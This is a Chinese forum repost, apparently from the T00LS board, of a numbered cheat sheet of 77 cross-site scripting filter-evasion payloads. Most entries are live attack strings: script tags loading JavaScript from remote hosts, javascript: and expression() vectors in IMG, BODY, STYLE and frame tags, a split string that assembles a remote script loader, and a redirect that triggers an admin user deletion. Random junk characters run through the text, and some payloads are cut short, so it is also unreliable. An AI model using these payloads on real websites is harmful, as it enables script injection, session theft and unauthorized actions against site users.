貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
' o" }: n1 _8 }5 w% D6 M/ U% M(1)普通的XSS JavaScript注入0 l+ g& M" {: X+ T }! L
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 J* t4 `6 m# s2 N3 O7 _0 w
(2)IMG标签XSS使用JavaScript命令% w/ I2 ~& r) U5 E6 W# n( C+ C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 ~# ^0 x z, Y4 Y& f- Z: s
(3)IMG标签无分号无引号
( V& X1 I* f! ^# v$ }4 Y/ J, r4 W<IMG SRC=javascript:alert(‘XSS’)>
% @% Z0 ]- m. C D3 K6 E' ](4)IMG标签大小写不敏感1 Z$ n% O) Z' V2 {) e' A8 t
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ e" \8 c6 T& L& {4 j% P Y2 l(5)HTML编码(必须有分号)9 F* M# h! w3 n3 s2 ^. }. g; G! ?
<IMG SRC=javascript:alert(“XSS”)>* E' G# |" F. f& s5 `) ^8 x
(6)修正缺陷IMG标签) B* D _. U% f" N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 k$ E0 t5 F# O% q: l" a
4 z, ]3 u( {2 g/ ]6 K8 v4 f) V
7 R `& K0 P4 o5 l- g- ^ O
(7)formCharCode标签(计算器)
0 M6 t4 |( n$ f( M6 s( L' o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 u& o0 c" z1 t+ m3 n' i$ Z(8)UTF-8的Unicode编码(计算器)
% @& y+ G5 b3 U<IMG SRC=jav..省略..S')>& b' w9 V" L; G: K& Q
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: ~+ i+ N6 { ^' E" R D<IMG SRC=jav..省略..S')>5 P! P5 m( W. Y5 H
(10)十六进制编码也是没有分号(计算器)
- c! A, V2 R$ F8 Z<IMG SRC=java..省略..XSS')>% T# q- C1 {$ z: f" A
(11)嵌入式标签,将Javascript分开1 ^: j( U) S9 b) |, r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) f9 ?2 X, K, \. |- E4 l(12)嵌入式编码标签,将Javascript分开
8 ]( z: `. E0 t<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 L/ U9 Q; E- N(13)嵌入式换行符
6 T4 G# {) R& `2 y9 M<IMG SRC=”jav ascript:alert(‘XSS’);”>6 e! }1 W7 l* F
(14)嵌入式回车
) v* q/ |" i! q, W G% o6 p<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 |5 g. f5 U' l! X(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 X1 m, U4 f D<IMG SRC=”javascript:alert(‘XSS‘)”>
4 v+ h" P' x5 G( n! U(16)解决限制字符(要求同页面)3 e9 ?0 o4 b9 b1 I: ]
<script>z=’document.’</script>
( F* j2 R* Q9 |0 Z2 @<script>z=z+’write(“‘</script>8 b+ k: G3 O, M6 t! l$ I+ v9 j
<script>z=z+’<script’</script>/ k# m! f1 s0 _# b0 @' z; |6 A
<script>z=z+’ src=ht’</script>6 K% f3 `8 C4 m3 f
<script>z=z+’tp://ww’</script>
4 o0 y( u. ^% c0 B<script>z=z+’w.shell’</script>; }/ M( E m/ l: N6 j+ p! E
<script>z=z+’.net/1.’</script>
: \8 Z. x8 G$ X$ d8 W: P<script>z=z+’js></sc’</script>+ Y- G$ _, l" ^
<script>z=z+’ript>”)’</script>
2 z3 l$ ]: N# g9 o6 z( Q, K9 o<script>eval_r(z)</script>
2 J7 o8 l0 X/ v) p" e% p1 _(17)空字符12-7-1 T00LS - Powered by Discuz! Board c8 U0 e! [/ I1 b9 }
https://www.t00ls.net/viewthread ... table&tid=15267 2/61 o; t) {, A7 N* C$ F$ q I% i3 P
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 s5 m+ K2 w, s! z6 X5 [
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ C' }; ]5 L ]6 {, I# h. Cperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 |6 k; W9 M5 r
(19)Spaces和meta前的IMG标签
* \# ]& G! C$ c; n; w<IMG SRC=” javascript:alert(‘XSS’);”>
3 [! ~* L n$ O( a; D# {(20)Non-alpha-non-digit XSS4 z* t: Z' e+ R6 X9 K! L+ Q% ~& O
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
1 D1 i' p t Y4 c- s/ F0 m I(21)Non-alpha-non-digit XSS to 2, Y1 ^2 @) q9 X3 I
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 Q% J: e* K; ?) i) m$ x+ O: L(22)Non-alpha-non-digit XSS to 38 e# `/ y/ u6 q# z' d7 j
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ g( ]+ J5 |2 [- c1 h(23)双开括号1 D _, r2 {4 v0 V3 y. M: D2 E
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# N% V6 W' k1 c+ l/ N4 L(24)无结束脚本标记(仅火狐等浏览器)
8 Z0 n$ q8 K( i2 w- O5 F- x<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# Y$ W+ f/ z" ?" h# b2 I(25)无结束脚本标记2
4 t# Y- C: }* L* R, Z<SCRIPT SRC=//3w.org/XSS/xss.js>
1 [- ?& e; v( }4 H(26)半开的HTML/JavaScript XSS+ D3 ~6 v2 V! P& [
<IMG SRC=”javascript:alert(‘XSS’)”
3 {' L$ W) ]( I(27)双开角括号
$ P, v1 i7 y, C3 {" C<iframe src=http://3w.org/XSS.html <1 p3 X6 W. x4 W4 z, C3 t
(28)无单引号 双引号 分号) R2 c2 ~' U6 K& N5 t4 Y
<SCRIPT>a=/XSS/
% P8 M) G7 h$ m8 s$ [8 W" e3 M4 Lalert(a.source)</SCRIPT>, H6 N0 q2 c1 P8 s6 ~8 y& E3 _ k
(29)换码过滤的JavaScript
% x2 z8 Z6 {! g i1 j. X\”;alert(‘XSS’);//' P5 N& a& U" i& S0 h
(30)结束Title标签
- J, e. G5 C0 I0 x k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT> A, H; G2 U, q
(31)Input Image: v0 k% R) q! z$ O6 ^6 J: ^
<INPUT SRC=”javascript:alert(‘XSS’);”>
' D# A9 x4 l9 \" a4 J/ R(32)BODY Image' W9 {( n7 \; u: a: Z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
9 v& N: R. H7 _4 K(33)BODY标签
1 l& M, m5 a! W/ {, [/ ^2 I<BODY(‘XSS’)>
8 s, @8 F4 G% f7 X \(34)IMG Dynsrc
; }' I0 j, L2 A( h. F7 C; c7 @<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ G. [ p) [5 Z% Q) @6 y(35)IMG Lowsrc9 K" a( K9 R: A0 u5 v. p" l
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 W4 X5 U. {$ R4 j' L8 I(36)BGSOUND
# d2 B$ V1 A" ]* s% J+ U1 S<BGSOUND SRC=”javascript:alert(‘XSS’);”>
/ j7 C' I$ B4 ]! n/ ^(37)STYLE sheet
6 `0 }9 X; g6 G' [1 T+ J) x, U<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>+ C4 T2 r1 t c$ B8 T0 k- W! \
(38)远程样式表
" R0 U, V9 N& ]* P. B<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) X/ L" `9 v5 K. R! X7 X" A
(39)List-style-image(列表式)* w0 Z3 m- ]" n" B1 n0 A) U9 |
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
' X) d7 ^& c& [! H0 Y+ J* k; P! z(40)IMG VBscript4 o; h. H2 Y5 z2 ]* E5 D" |
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- d1 n( V: ^: ^5 O& n(41)META链接url2 o/ c+ m' y: _! i& K
8 @7 ~' j( `" S7 x
+ X# p; q$ G( o9 ~" [<META HTTP-EQUIV=”refresh” CONTENT=”0;
+ @! \$ f; O3 j2 K9 v$ h" Y& u& CURL=http://;URL=javascript:alert(‘XSS’);”>' N, ]6 H$ r% a- r
(42)Iframe
0 e) _# B" _( p* x+ F. k& D<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>' a% L2 W3 I5 T
(43)Frame! G+ i8 {9 P& ]/ K5 Z- T5 E& F7 T
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
+ n( W$ N! `! }https://www.t00ls.net/viewthread ... table&tid=15267 3/61 e+ \5 l2 E, a# y
(44)Table
6 z k* a2 m, q3 K' j8 _# B<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# w% P# ~' Y. d) e2 d7 K$ m(45)TD! R; V8 G% T, i& b4 R5 ]9 n
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, v! m6 Y e/ \" c% b. Z( l
(46)DIV background-image
. D' |8 [% l' W: C% X5 B<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' @, P7 y" v4 b$ W" ?) I9 J
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-7 X. a0 C0 q: n4 k8 b/ ^: i
8&13&12288&65279)9 j: o, f, L1 {5 ^# O5 m( G/ P; s
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& ^' b9 Z# p, [; b
(48)DIV expression- ]+ O/ P- s9 f. ~
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>; R4 r8 _; t7 R* w4 ]
(49)STYLE属性分拆表达
+ r& g' t* @+ k7 J1 `$ m- c8 J<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>& {: T) ?" I9 I3 f5 `( z
(50)匿名STYLE(组成:开角号和一个字母开头)9 A5 I& O. W" o
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 |& z" j4 e6 f
(51)STYLE background-image+ ]# l% k$ ?) F5 Q: N3 g7 r! v, `
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A: Y% j: q! L$ c& d' [9 p" @
CLASS=XSS></A>+ w$ Q, x2 |4 z4 O8 X& b. d. w/ O2 {
(52)IMG STYLE方式- s( D: Y6 v- x }1 }3 {) c
exppression(alert(“XSS”))’>8 N0 n `0 L" P: W4 d" I
(53)STYLE background* f% C6 [* f% |) S b# T: g5 O* E
<STYLE><STYLE; K! m1 T+ o9 @$ x! u2 z( d
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>6 J; ~2 ~# G; V0 [, n' p+ U# G
(54)BASE
* {; u! `/ p" j) p5 v8 C<BASE HREF=”javascript:alert(‘XSS’);//”>+ X# d, b5 n$ ]$ d
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. y' v' [+ E1 U# O B% P2 K
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>4 e3 d! O6 P: W Y. K
(56)在flash中使用ActionScrpt可以混进你XSS的代码
! K/ ]. n5 T+ }* q, v7 ~' Pa=”get”;
% N W# E0 v! Y% ?+ V8 @4 Ob=”URL(\”";
& G! I: h) W7 c( R: D- bc=”javascript:”;
. h1 J$ B4 o0 ^* y D1 J. pd=”alert(‘XSS’);\”)”;: ?& G; O" E/ [$ ~' N5 R4 p3 e
eval_r(a+b+c+d);9 i' n# J# A. H1 v; {. |! B
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
+ W) I0 U2 l8 E p, ]& h" t& p" a<HTML xmlns:xss>: i+ A, d2 `9 Y, G% ?. M
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> s7 D k/ ?$ N0 y
<xss:xss>XSS</xss:xss>
( h( h' C: i' k1 W3 }</HTML>3 p$ N8 q" h# Q4 {- n# f, {
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ B) h0 ]5 b) e3 O7 I; U- ~' [: A
<SCRIPT SRC=””></SCRIPT>4 U& ~/ t% G, q: w5 c
(59)IMG嵌入式命令,可执行任意命令
. }" P0 c' P5 v<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' S- ]* N1 r2 v- s' ^. h(60)IMG嵌入式命令(a.jpg在同服务器)& n R6 k. B& u4 a$ x* W- z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
$ J- O, f) O. q! g: ~ e(61)绕符号过滤
9 R; K3 P" K& k! Z* C' u6 c `<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ V* o, i" ^7 ?3 j% d7 ^
(62)2 B/ F2 _. x3 w6 ~& \1 V4 M
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ \5 {- T5 d8 O& L: B
(63)
. T8 f# r. X" w0 D# i5 k, ^<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>. K1 P! j" Q& {; A, X/ P3 o6 l
(64)
; s8 ~8 a4 E3 q, a ^& l<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% d" \- p: Y/ d' o) s8 k3 t(65): u- B0 {9 t; Y3 q. e
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* I& v5 I0 X2 i' j9 z/ D
(66)12-7-1 T00LS - Powered by Discuz! Board
5 `' b7 s, f9 J' A+ shttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
7 B% a/ y' t: C4 B<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% |/ ]% f0 f% c9 b2 w(67)2 o6 _3 U1 Z) c6 y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
6 q# q9 F+ |* ]5 [0 B: k</SCRIPT>' o' ~ K! E* }) k$ d0 y5 s
(68)URL绕行2 W: N& b: `* v& K( d
<A HREF=”http://127.0.0.1/”>XSS</A>. d5 k+ f* W/ a' t+ F2 i- Y/ ?
(69)URL编码
1 s/ X: t, J/ ]* w8 ^9 N<A HREF=”http://3w.org”>XSS</A>
4 A4 q; X3 x8 I# R/ L# x& F(70)IP十进制/ s8 n7 @2 H' P6 p8 P
<A HREF=”http://3232235521″>XSS</A>8 C3 v# E6 X( _( v# B1 W3 A
(71)IP十六进制) i7 O$ S6 w; r g
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ c: ^6 ]: I6 ~# Q" |(72)IP八进制/ D) @& a5 R, m1 T/ [
<A HREF=”http://0300.0250.0000.0001″>XSS</A>! c+ C/ ]2 S0 e
(73)混合编码
* H; _4 s, |2 c1 C! L<A HREF=”h
( f8 ]* O5 X4 z( X; j, P/ q; `, Rtt p://6 6.000146.0×7.147/”">XSS</A>
1 q/ j3 |" |4 N' D0 ^(74)节省[http:]
0 E- @- g8 [' Z4 v: v<A HREF=”//www.google.com/”>XSS</A>+ i3 o% `4 o7 z$ P1 ]- T
(75)节省[www]% _! w* v* R) W1 \. G! `5 r
<A HREF=”http://google.com/”>XSS</A>( ^, v+ u; d* p( V9 t% V1 C
(76)绝对点绝对DNS* s1 a5 r3 \5 Z! E
<A HREF=”http://www.google.com./”>XSS</A>
; Y# B9 F" V! U/ r R8 R) O(77)javascript链接; ~: C. e- b! Z
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( A* S, r' M3 D! G& Y
; n' }' ~) t8 f% R/ [原文地址:http://fuzzexp.org/u/0day/?p=14
$ ^1 T3 i/ n" }: Y1 t- G" t$ x( c) g) ~0 ^0 r8 o+ u5 O
|
发表于 2013-4-19 19:22:37
收藏
支持
反对